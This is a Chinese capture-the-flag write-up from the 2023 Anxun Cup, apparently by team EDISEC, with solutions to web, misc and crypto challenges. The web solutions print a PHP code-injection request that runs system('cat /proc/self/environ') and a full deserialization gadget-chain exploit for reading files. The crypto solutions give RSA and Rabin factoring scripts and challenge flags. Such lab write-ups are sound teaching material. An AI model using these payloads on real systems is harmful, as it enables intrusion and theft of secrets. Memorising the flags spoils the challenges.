2023安洵杯 - WriteUp By EDISEC

admin
admin
admin
138674
文章
114
评论
2023年12月28日08:38:33评论45 views字数 18274阅读60分54秒阅读模式
01

Web

1

what's my name
参考:https://www.cnblogs.com/-chenxs/p/11459374.html

先本地测一下

2023安洵杯 - WriteUp By EDISEC

2023安洵杯 - WriteUp By EDISEC

$miao后面的数值刷新会不断增大,那么我们直接重复发包就好,$miao后两位的数字迟早会等于的$d0g3的长度的

后来一直没过$name===$miao 这个判断。。。

直接按位输出一下ascii看看,原来前面还有个空字符,用$name前面加个%00就行。

2023安洵杯 - WriteUp By EDISEC

payload
GET /?d0g3='"]);}eval(system('cat+/proc/self/environ'));/****include&name=%00lambda_57 HTTP/1.1Host: 47.108.206.43:37236User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1

2

easy_unserialize
链子有点长 调来调去的
<?phpclass Good{    public $g1;    private $gg2;

    public function __construct($ggg3){        $this->gg2 = $ggg3;    }

    public function __isset($arg1){

        if(!preg_match("/a-zA-Z0-9~-=!^+()/",$this->gg2))        {            if ($this->gg2)            {                echo "__isset";                $this->g1->g1=666;            }        }else{            die("No");        }    }}class Luck{    public $l1;    public $ll2;    private $md5;    public $lll3;    public function __construct($a){        $this->md5 = $a;    }    public function __toString(){        echo  "__toString";        $new = $this->l1;        return $new();    }

    public function __get($arg1){        echo "__get";        $this->ll2->ll2('b2');    }

    public function __unset($arg1){        if(md5(md5($this->md5)) == 666)        {            if(empty($this->lll3->lll3)){                echo "There is noting";            }        }    }}

class To{    public $t1;    public $tt2;    public $arg1;    public function  __call($arg1,$arg2){

        if(urldecode($this->arg1)===base64_decode($this->arg1))        {            echo "__call";            echo $this->t1;        }    }    public function __set($arg1,$arg2){        echo "__set";        if($this->tt2->tt2)        {            echo "what are you doing?";        }    }}class You{    public $y1;    public function __wakeup(){        unset($this->y1->y1);    }}class Flag{    public function __invoke(){        var_dump($this);        echo "May be you can get what you want here";        array_walk($this, function ($one, $two) {            var_dump($one);            var_dump($two);            $three = new $two($one);            foreach($three as $tmp){                echo ($tmp.'<br>');            }        });    }}

$one = "/FfffLlllLaAaaggGgGg";  $l1 = new Flag();$l1->SplFileObject = $one;        // 先用DirectoryIterator 查看flag路径 $md5 = '213';                     //上面的one 改成 /$t1 = new Luck($md5);$t1->l1=$l1;$arg1 = array();$ll2 = new To();$ll2->t1=$t1;$ll2->arg1=$arg1;$md5 = "213";$tt2 = new Luck($md5);$tt2->ll2=$ll2;$To = new To();$To->tt2=$tt2;$ggg3 = "$";$lll3= new Good($ggg3);$lll3->g1=$To;$md5 = "213";$Luck = new Luck($md5);$Luck->lll3=$lll3;$You = new You();$You->y1=$Luck;$poc = serialize($You);echo urlencode($poc);?>
flag{6b531f4a-a15a-11ee-88e5-00163e0447d0}
02

Misc

1

Nahida

2023安洵杯 - WriteUp By EDISEC

通过010不难观察发现是个jpg,利用cyberchef转换

2023安洵杯 - WriteUp By EDISEC

cyberchef吃数据(冗余数据还原成中文,用silenteye了应该是。。。

2023安洵杯 - WriteUp By EDISEC

2023安洵杯 - WriteUp By EDISEC

2

misc-dacongのsecret[赛后复现]

2023安洵杯 - WriteUp By EDISEC

单图FFT盲水印得到上图;利用密码解开压缩包得到新的jpg图片,分析发现尾部有压缩包。

2023安洵杯 - WriteUp By EDISEC

逆序取出zip,需要密码根据提示继续分析png

从Pngcheck的结果来看,上一个Png的尾块IDAT块显然是冗余的,不妨提取出来作为单独的png,补全头和尾再进行宽高的爆破,这里用puzzlesolve。

2023安洵杯 - WriteUp By EDISEC

拿到第二个压缩包的密码

2023安洵杯 - WriteUp By EDISEC

2023安洵杯 - WriteUp By EDISEC

2023安洵杯 - WriteUp By EDISEC

解开压缩包,base64隐写,拿到密钥

2023安洵杯 - WriteUp By EDISEC

flag{d@C0ng_1s_r3@lIy_Re@iLY_Cute}
03

Crypto

1

010101

第一步就是proof of work,

经过代码的本地测试,实际处理,就是p值错0,1,2个bit,过proof of work以后,只需要逐位校验即可,过滤出所有的素数,然后测试是否为n的一个因子即可,分解完成即可求得flag:

from pwn import *import itertools,hashlibimport stringimport refrom gmpy2 import *from functools import reducefrom Crypto.Util.number import *





io = remote('124.71.177.14', 10001)strr = io.recvline().strip()print(strr)'''s1,s2 = strr.strip().split(b'n')print(strr)print(s1)'''s3,h = strr.split(b':')print(s3)#print(h)ha = h.strip()print(ha)s4,s5 = s3.split(b'+')s6= s5.strip().replace(b')',b'')print(s6)

chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'for t in itertools.product(chars, repeat=4):    w = ''.join(t)    x = s6    test = hashlib.sha256((w+x.decode()).encode()).hexdigest().encode()    #print(test)    if test == ha:        print(w)        breakp1 = wio.recvuntil(b':')io.sendline(p1)#io.recvuntil(b'Press 1 to get ciphertextn')io.sendline(b'1')io.recvline()io.recvline()n = io.recvline().replace(b'n',b'')p = io.recvline().replace(b'n',b'')c = io.recvline().replace(b'n',b'')pp = int(p,2)print(n)print(p)print(c)print(isPrime(pp))io.interactive()

逐位爆破:

# -*- coding: utf-8 -*-"""Created on Sat Dec 23 14:53:58 2023

@author: zwhub"""



from Crypto.Util.number import *from gmpy2 import *

def check_and_convert(binary_string):    prime_numbers = []    for i in range(len(binary_string)):        flipped_string = binary_string[:i] + str(1 - int(binary_string[i])) + binary_string[i+1:]        number = int(flipped_string, 2)        if is_prime(number):            prime_numbers.append(number)    return prime_numbers



binary_string = "11010110011101001110000110000111111100110011110101010110101001001111101101001011110100000100111000001111110011101011010001011011000110001100101110110101010110010001011101101101100110000011010110000111011011101010110010110010001101000000001010111101110000000010000101011011010111000111001111010011110010011001000001101000100101011000110110111101111101010010100101101100010011111111000000010000001001111101101001110100011111100110010011011011101010110011111101100011011001000011001111001001010100101000101111101000010111100110101100000000110100011111010010110010111100110101000110100000001110010110010010110111101001011100100101110101001010111100100101101010101101101110100000110011111010000011000000100010001111100010110110011110100001110000001010011001110101110100001000011001101111010101011101110100101000001111010001001101111100111110100101110110010001111010111010100101011011110101001011000000001001000111100101000101101101010011100010111001011010000001100010011111101000101101001010011111111100101011110011010100110001110010100011000011010110100010010001101001100011110101001011101110011111110010110111101110111100000110010101000000110110000100010101011110010001111100110111111000111110111110011101001100001100111010001100000011111110100010010110000011001011110100010011000100101011000000011011101010110100011100010100111001101111100100000011110101110110000111101010001111011111010001011110101001000101000010110011111000110011000011101011000001010110101001101100100001000111001111000111000101001010100000001110101011100110110111000011010101101101110001111101001101011000100100111011000110111111101001101100111111000111011111110110010011010101001011110111100011001110000011110011001011000011010110110100110010111111001110001010011011000100111000100000100110011010100100111001000001100100010100101000101101100111000000001111101101010111111101111000100101000111011100110000010011001011111010100101011001111100100110100010110101111101001110011101000010101011110001110001100010111010100011100111111011101000001001010111011101100111100011011000101001"

prime_numbers = check_and_convert(binary_string)

pp = prime_numbersn = 851294229068035786370272156858678289487548167899412914269211060855957578006972380605995394133080485793121849082520577575353812227053732530074654005278682486680823951157798448875760358196146750352072010307928833537226843001002101028800343878928029652008410143768298461913684276754443407016820694847133724093335055221246095109029589612178727687207753307510933523763538651137423859309102470609221318384219930917458997920728555614187452052717296736440971409026374958404218529057682430970618387104545709480405868195142446414345805845438688795621565629000493467296174990870550780074771392374181951688555993274391041895402291885491036510965790233636624257217479412319725338919435315853264852853910554063001491619806575805912505641655819031634873893632182077270796589813033493973879959050865902183271114527380006473750085240540881323507343348375602047816472120949410916596802938359302583544653491500513139000463987169016099022148861110105720022298559222511329821317796394503901465180570934608808529803042902024032417785526179302850590362470812528525787110849843748934722698087312304699270111634688077531733624641351834560131573269149078476735687481155084421285236272198845832423034652330211069156868935691027284240126949684578499668834992349e = 0x10001c = 817370527656686076332447341471548462783847809446816486934341997101652241275288872022820956059512497293398218107944520515342645165995031033795657638215333561052534816891355400727623631803433540490258918561607744695572733133535871108752088321065313994544002437069743244174102031098834199438846418399831349654458096914843605463712413287667040446474231367370699343840492356566067691991043557300288351882198700788467301512882040100874895763768100402452374026533640009448048982656973770683330004922549778366239451902317478381159881939530126936611058164350356801026787179555344470733081641693046103019180955543588400442670162325573232968757916424982369269810084874266371409884594563093543749391295863836255329795018846692384614600836875019710470570546621138084754896683120934111307462940602993965097992123764755597598599217862867656308496528173892309551341976247056357300116156349175611955720467539312628881095925981007115325573375896965405146363992577952014400220220572068825373499455961513839147967074164428014762904588920135917120252811162657216043238170653448537633867261987437595253044863910560575957044044379215702876827183769498367582669507718261343932263924509348939748672404960494725533702147606349604697746549418290098816320934508

for i in pp:    q = n // i    if i*q == n:        p = i        print(p)        phi = (p - 1)*(q - 1)        d = invert(e,phi)        m = pow(c,d,n)        print(long_to_bytes(m))        break

2023安洵杯 - WriteUp By EDISEC

flag:D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}

2

rabin

首先还是过proofofwork,这个用上一题的就行了,获得数据:

n = 212373490692860326225006394373965222365583518797684198779710699042499426556263173158236749890683898742263923181576464969459091256996825869450834956484316865838881696246946422135830132234289226005791186091504985370381407727002472361831503894107603575679670705188662800367942059491116867936919211111180401133861650569134738337081704505307462794283225166154412239182440488119623389201527430500311725373864593399593681738028225053627441929920269020661056042410650576130736125794514758998929832471512395307823503874617053568091304365860857934350504239598713056161759237414301421183183921582275334218228457475445048949904616231884046162948134161421004916879289840191523754722865993265412396331291988962681809059157189670968635958529325367799911705118064693259437298144199127496861959708567049815694874799223476419854146356290808186638731871640403726960270485625575903956068614422035375699384768519430165375606151909031089630668383705634193316427624111895467172774685681841871112664353089252455983535397198207inv_p = 56573845963096327869513640212737711026359666316803574884303727365016852242466120180111613737831185027579749339663601048817116821309187434284645053920559617069802139109843485798696598421795116790575544859860295693379458788936217876738719535657637904216023706327260149228177815463157158876624238872805046214522inv_q = 83001529204168151731929999420717881347371914952845656410081236063436279995743679496028710403219893268803456838918579673833744283243202229989449685118611749073838396816670980613895026491742524907359144602379767142658742930204073714333874704453393496997797091368610886038136413817517253702128681113245496728508c1 = 83290468046109205364191873899713823034418031465422526699867318879592829993612970207982741541472948895002891405137533133978921456342620317431687489575979222548731057093972517891649165877631799125816337523011818027473945299920648573270536370761233732126531912638675667422761820865381429812175748656474790769429863555517631839096286360616980201760463389779634053464494647438425693637962944378142042372020498559550603388129135418859812864610999474620305958393747953965648381720903881867128432705889652610759456141417218048889890262283375515257645646569441344702884959539238545581599901081788188175562072095920530372802496073921559366637595052435178995331865898041967644840602661040976194093486489733068973080550057948392756967093981581932712897972235465708544129268275632296156665207661551568716394597200507803466027731721213771465499709434122682732768908043244595555056165969526645874463749234338164911498886007719232538342113945322351764020567222777662471740738576219252748229810994392261928958694131257c2 = 153535991032878567415201652028728214500001812799828915111023584577704915838349626520869732563333169049632694878210164430731188296207624651875009819457867361037555188319167127596937989683208138690647613445498301528822029331533061436392684207384657977564078353439162533554130508875416586430112975477852354812017563795350010049045278367426799293770007571054673266408380098823260616587540804114786570922491406112053919245668719584357262450648414997253823244210987692306341239110934605704403399256715255504523549243361117402558743225705228198097790916631280923107945253313197773037903234475459009088904844374538058539658302765478798865740345312462636234150792777998497367927846063353478827310985359406448412273138272703584190242253774729395315813687072255475719057691468815992567913762876095685795783899813112464015622714898533108940611871150464907656131994912460149400607032186596147226979852921610817755456602314024889256958799295485355378655179998153343394562998492836171129345207489414612120520702914661
光滑数可以分解出r
import gmpy2from Crypto.Util.number import *

def Pollards_p_1(N):    a = 2    n = 2    while True:        a = pow(a, n, N)        res = gmpy2.gcd(a - 1, N)        if res != 1 and res != N:            print 'n =', n            print 'p =', res            return res        n += 1

n = 212373490692860326225006394373965222365583518797684198779710699042499426556263173158236749890683898742263923181576464969459091256996825869450834956484316865838881696246946422135830132234289226005791186091504985370381407727002472361831503894107603575679670705188662800367942059491116867936919211111180401133861650569134738337081704505307462794283225166154412239182440488119623389201527430500311725373864593399593681738028225053627441929920269020661056042410650576130736125794514758998929832471512395307823503874617053568091304365860857934350504239598713056161759237414301421183183921582275334218228457475445048949904616231884046162948134161421004916879289840191523754722865993265412396331291988962681809059157189670968635958529325367799911705118064693259437298144199127496861959708567049815694874799223476419854146356290808186638731871640403726960270485625575903956068614422035375699384768519430165375606151909031089630668383705634193316427624111895467172774685681841871112664353089252455983535397198207

p = Pollards_p_1(n)print p

2023安洵杯 - WriteUp By EDISEC

并且得到x=8,于是就可以得到p*q的值,于是可以根据q^-1,p^-1的值来建立等式,求解方程,得到pq。

2023安洵杯 - WriteUp By EDISEC

然后就是题目已知了phi = (p-1)*(q-1)*(q-1),e2*d =1 mod phi,可以先爆破e2。

from gmpy2 import *from Crypto.Util.number import *from tqdm import tqdmimport string

r = 10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087

n = 212373490692860326225006394373965222365583518797684198779710699042499426556263173158236749890683898742263923181576464969459091256996825869450834956484316865838881696246946422135830132234289226005791186091504985370381407727002472361831503894107603575679670705188662800367942059491116867936919211111180401133861650569134738337081704505307462794283225166154412239182440488119623389201527430500311725373864593399593681738028225053627441929920269020661056042410650576130736125794514758998929832471512395307823503874617053568091304365860857934350504239598713056161759237414301421183183921582275334218228457475445048949904616231884046162948134161421004916879289840191523754722865993265412396331291988962681809059157189670968635958529325367799911705118064693259437298144199127496861959708567049815694874799223476419854146356290808186638731871640403726960270485625575903956068614422035375699384768519430165375606151909031089630668383705634193316427624111895467172774685681841871112664353089252455983535397198207

c1 = 83290468046109205364191873899713823034418031465422526699867318879592829993612970207982741541472948895002891405137533133978921456342620317431687489575979222548731057093972517891649165877631799125816337523011818027473945299920648573270536370761233732126531912638675667422761820865381429812175748656474790769429863555517631839096286360616980201760463389779634053464494647438425693637962944378142042372020498559550603388129135418859812864610999474620305958393747953965648381720903881867128432705889652610759456141417218048889890262283375515257645646569441344702884959539238545581599901081788188175562072095920530372802496073921559366637595052435178995331865898041967644840602661040976194093486489733068973080550057948392756967093981581932712897972235465708544129268275632296156665207661551568716394597200507803466027731721213771465499709434122682732768908043244595555056165969526645874463749234338164911498886007719232538342113945322351764020567222777662471740738576219252748229810994392261928958694131257c2 = 153535991032878567415201652028728214500001812799828915111023584577704915838349626520869732563333169049632694878210164430731188296207624651875009819457867361037555188319167127596937989683208138690647613445498301528822029331533061436392684207384657977564078353439162533554130508875416586430112975477852354812017563795350010049045278367426799293770007571054673266408380098823260616587540804114786570922491406112053919245668719584357262450648414997253823244210987692306341239110934605704403399256715255504523549243361117402558743225705228198097790916631280923107945253313197773037903234475459009088904844374538058539658302765478798865740345312462636234150792777998497367927846063353478827310985359406448412273138272703584190242253774729395315813687072255475719057691468815992567913762876095685795783899813112464015622714898533108940611871150464907656131994912460149400607032186596147226979852921610817755456602314024889256958799295485355378655179998153343394562998492836171129345207489414612120520702914661

nn = n // rprint(nn)p = 129492677879640361898569564489440604028112363755884867492416678820540698413191519941443858935354376329119233276575339313679348651896429690313729715970716187875736416207262237146065316452990475298865758111531390481111337959004315956278375471242206273913929591898853888274453964194554448742839870287428293861443q = 157576205803162293134377345989898139756698491293986968570611950827939391559516661797282161210528757569240320736635927143263730659592997096526188053008019309559942202105760275808958411880385293479048010769901286991849555916101683350527252070125028475841559156815174113941986160623175189651608622010157410075627



print(p*q*r==n)phi = (p - 1)*(q - 1)

for e in tqdm(range(3, 100)):    try:        d = invert(e,phi)        m = pow(c2,d,p*q)        tt = long_to_bytes(m)        if '}' in tt and tt[0] in string.printable and tt[1] in string.printable:            print(e)            print long_to_bytes(m)    except:        pass

2023安洵杯 - WriteUp By EDISEC

e2=5,根据关系函数,可以推得e1=2,通过rabin即可

2023安洵杯 - WriteUp By EDISEC

Flag: D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}

原文始发于微信公众号(EDI安全):2023安洵杯 - WriteUp By EDISEC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月28日08:38:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2023安洵杯 - WriteUp By EDISEChttps://cn-sec.com/archives/2335745.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息